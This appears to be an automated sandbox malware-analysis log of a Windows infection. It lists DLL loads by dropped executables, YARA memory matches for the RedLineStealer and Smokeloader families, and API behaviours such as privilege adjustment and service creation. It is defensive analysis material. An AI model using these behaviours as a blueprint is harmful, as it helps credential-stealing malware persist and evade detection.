                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: riched20.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: usp10.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: msls31.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: explorerframe.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: sfc.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: sfc_os.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: oleacc.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: shfolder.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: wininet.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: appxsip.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: opcservices.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msvcr100.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: mozglue.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wsock32.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msvcp140.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: linkinfo.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: oleacc.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: shfolder.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wtsapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wkscli.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: cscapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: winsta.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: colorui.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: mscms.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coloradapterclient.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: compstui.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: inetres.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windowscodecs.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: appxsip.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: opcservices.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: shfolder.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: msacm32.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: riched20.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: usp10.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: msls31.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: oleacc.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: shfolder.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: secur32.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: dbghelp.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: wininet.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: winmm.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: sspicli.dll
                        Source: 00000011.00000002.3181473452.0000000000703000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 0000002A.00000002.3211879982.00000000012C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000023.00000002.3204206599.0000000001099000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                        Source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: 00000023.00000002.3216579731.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@200/533@0/100
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A407030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,17_2_6A407030
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: 12_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_00409448
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,14_2_004555E4
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,14_2_00455E0C
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: CreateServiceA,16_2_004028A4
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00414DE0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,17_2_00414DE0
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_00402988 CoCreateInstance,MultiByteToWideChar,15_2_00402988
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: 12_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,12_2_00409C34
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: 16_2_004026E9 StartServiceCtrlDispatcherA,16_2_004026E9
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: 16_2_004026E9 StartServiceCtrlDispatcherA,16_2_004026E9
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: 16_2_0040D234 StartServiceCtrlDispatcherA,16_2_0040D234
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\pxXbxOFPbFSHTNbciHYCsLtx.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7564
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:44312:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:12152:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5kguwrd.iza.ps1Jump to behavior
